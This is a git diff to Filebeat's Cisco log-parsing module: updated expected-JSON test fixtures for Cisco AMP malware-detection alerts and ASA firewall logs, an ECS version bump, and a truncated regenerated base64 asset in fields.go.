"cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533666694928269316", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 80000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533666694928269000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 319725, + "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", + "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", + "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", + "process.name": "rundll32.exe", + "process.pid": 2204, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:24.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176256962712305718", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 286000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176256962712306000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 321307, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:07.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "c6:4e:72:6f:69:14" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Eldorado:Alureon-tpd", + "cisco.amp.detection_id": "5825617250006073346", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "c6:4e:72:6f:69:14" + ], + "cisco.amp.timestamp_nanoseconds": 296000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 5825617250006073000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", + "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", + "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "file.name": "tdss.exe", + "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TDSS", + "host.name": "Demo_TDSS", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 322626, + "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", + "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", + "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", + "process.name": "explorer.exe", + "process.pid": 1892, + "related.hash": [ + "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "4a052246c5551e83d2d55f80e72f03eb", + "bc29f1e8460915596e1dcafd0c92d6309457d149" + ], + "related.hosts": [ + "Demo_TDSS" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:02.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "5a:ff:4a:a3:8a:2f" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "5826709511729053698", + "cisco.amp.event_type_id": 1090519084, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", + "cisco.amp.related.mac": [ + "5a:ff:4a:a3:8a:2f" + ], + "cisco.amp.timestamp_nanoseconds": 706000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 80, + "event.action": "DFC Threat Detected", + "event.dataset": "cisco.amp", + "event.id": 5826709511729054000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "fileset.name": "amp", + "host.hostname": "Demo_Tinba", + "host.name": "Demo_Tinba", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 324228, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", + "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", + "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", + "process.name": "Explorer.EXE", + "process.pid": 1600, + "related.hosts": [ + "Demo_Tinba" + ], + "related.ip": [ + "10.10.0.0", + "8.8.4.4", + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 1083, + "tags": [ + "cisco-amp", + "forwarded" + ], + "url.domain": "dak1otavola1ndos.com", + "url.extension": "php", + "url.original": "http://dak1otavola1ndos.com/h/index.php", + "url.path": "/h/index.php", + "url.scheme": "http" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/asa/config/input.yml b/x-pack/filebeat/module/cisco/asa/config/input.yml index 2e85cd4dfee1..5dadd775a99d 100644 --- a/x-pack/filebeat/module/cisco/asa/config/input.yml +++ b/x-pack/filebeat/module/cisco/asa/config/input.yml @@ -23,7 +23,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json index 1d225c42addf..2578835b3d0a 100644 --- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json @@ -1743,6 +1743,9 @@ "related.hosts": [ "dev01" ], + "related.user": [ + "aaaa" + ], "service.type": "cisco", "tags": [ "cisco-asa", @@ -1779,6 +1782,9 @@ "related.hosts": [ "dev01" ], + "related.user": [ + "aaaa" + ], "service.type": "cisco", "tags": [ "cisco-asa", @@ -2115,7 +2121,6 @@ "dev01" ], "related.ip": [ - "10.10.10.10", "10.10.10.10" ], "service.type": "cisco", @@ -2207,7 +2212,6 @@ "dev01" ], "related.ip": [ - "10.10.10.10", "10.10.10.10" ], "service.type": "cisco", @@ -2302,7 +2306,6 @@ "dev01" ], "related.ip": [ - "10.20.30.40", "10.20.30.40" ], "service.type": "cisco", @@ -2347,7 +2350,6 @@ "dev01" ], "related.ip": [ - "10.20.30.40", "10.20.30.40" ], "service.type": "cisco", @@ -2392,7 +2394,6 @@ "dev01" ], "related.ip": [ - "10.20.30.40", "10.20.30.40" ], "service.type": "cisco", @@ -2437,7 +2438,6 @@ "dev01" ], "related.ip": [ - "10.20.30.40", "10.20.30.40" ], "service.type": "cisco", @@ -2710,6 +2710,9 @@ "related.ip": [ "10.10.0.87" ], + "related.user": [ + "enable_15" + ], "service.type": "cisco", "source.address": "10.10.0.87", "source.ip": "10.10.0.87", @@ -2749,6 +2752,9 @@ "related.hosts": [ "dev01" ], + "related.user": [ + "enable_15" + ], "service.type": "cisco", "tags": [ "cisco-asa", @@ -2794,6 +2800,9 @@ "10.10.1.212", "10.10.1.254" ], + "related.user": [ + "*****" + ], "service.type": "cisco", "source.address": "10.10.1.212", "source.ip": "10.10.1.212", @@ -2837,6 +2846,9 @@ "related.ip": [ "10.10.0.87" ], + "related.user": [ + "admin" + ], "service.type": "cisco", "source.address": "10.10.0.87", "source.ip": "10.10.0.87", @@ -2884,6 +2896,9 @@ "10.10.0.87", "10.10.1.254" ], + "related.user": [ + "admin" + ], "service.type": "cisco", "source.address": "10.10.0.87", "source.ip": "10.10.0.87", @@ -2927,6 +2942,9 @@ "related.ip": [ "10.10.0.87" ], + "related.user": [ + "admin" + ], "service.type": "cisco", "source.address": "10.10.0.87", "source.ip": "10.10.0.87", @@ -3031,6 +3049,9 @@ "related.ip": [ "91.240.17.178" ], + "related.user": [ + "91.240.17.178" + ], "service.type": "cisco", "source.bytes": 297103, "source.user.name": "91.240.17.178", @@ -3071,6 +3092,9 @@ "related.ip": [ "8.8.8.8" ], + "related.user": [ + "testuser" + ], "service.type": "cisco", "source.address": "8.8.8.8", "source.as.number": 15169, @@ -3119,6 +3143,9 @@ "related.ip": [ "8.8.8.8" ], + "related.user": [ + "testuser" + ], "service.type": "cisco", "source.address": "8.8.8.8", "source.as.number": 15169, @@ -3167,6 +3194,9 @@ "related.ip": [ "192.168.50.1" ], + "related.user": [ + "alice" + ], "service.type": "cisco", "source.address": "192.168.50.1", "source.ip": "192.168.50.1", diff --git a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json index a57299252caf..bcd775e4e1e6 100644 --- a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json @@ -96,7 +96,6 @@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -143,7 +142,6 @@ "observer.type": "firewall", "observer.vendor": "Cisco", "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -197,7 +195,6 @@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -242,7 +239,6 @@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/fields.go b/x-pack/filebeat/module/cisco/fields.go index de57daee50fe..4d465edfa975 100644 --- a/x-pack/filebeat/module/cisco/fields.go +++ b/x-pack/filebeat/module/cisco/fields.go @@ -19,5 +19,5 @@ func init() { // AssetCisco returns asset data. // This is the base64 encoded gzipped contents of module/cisco. func AssetCisco() string { - return "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